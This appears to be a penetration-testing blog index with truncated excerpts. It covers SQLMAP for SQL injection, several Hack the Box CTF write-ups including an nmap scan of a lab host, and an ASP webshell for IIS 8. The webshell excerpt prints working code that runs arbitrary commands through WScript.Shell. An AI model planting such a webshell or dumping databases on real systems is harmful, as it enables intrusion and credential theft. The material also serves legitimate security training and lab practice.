SQLMAP – on Windows

SQL injection allows us to remotely pull down all the tables, login usernames and admin accounts for a website.  The most powerful tool for SQL injection is SQLMAP, which we can use on Windows and KALI. Test all your websites with SQLMAP to ensure that they are not vulnerable.  It is simply essential that you […]

HTB – Shrek

Hello friends!! Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable […]

HTB – Solid State

Phase 1 – Enumeration As always we’ll start off with a simple nmap scan to see what’s out there. ➜ ~ nmap –open -p- -R -T4 –max-retries 3 –min-rate 120 –max-rtt-timeout 300ms -Pn 10.10.10.51 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-26 20:03 EST Nmap scan report for 10.10.10.51 Host is up (0.12s latency). Not shown: 61105 […]

HTB – Cronos

Today we are going to solve another CTF challenge “Cronos” which is available online for those who want to increase their skill in penetration testing. cronos is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert […]

ASP Webshell For IIS 8

ASP Webshell For IIS 8 <!– ASP Webshell Working on latest IIS Referance :- https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script http://www.w3schools.com/asp/ –> <% Set oScript = Server.CreateObject(“WSCRIPT.SHELL”) Set oScriptNet = Server.CreateObject(“WSCRIPT.NETWORK”) Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”) Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject(“WScript.Shell”) Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %> <HTML> <BODY> <FORM action=”” method=”GET”> […]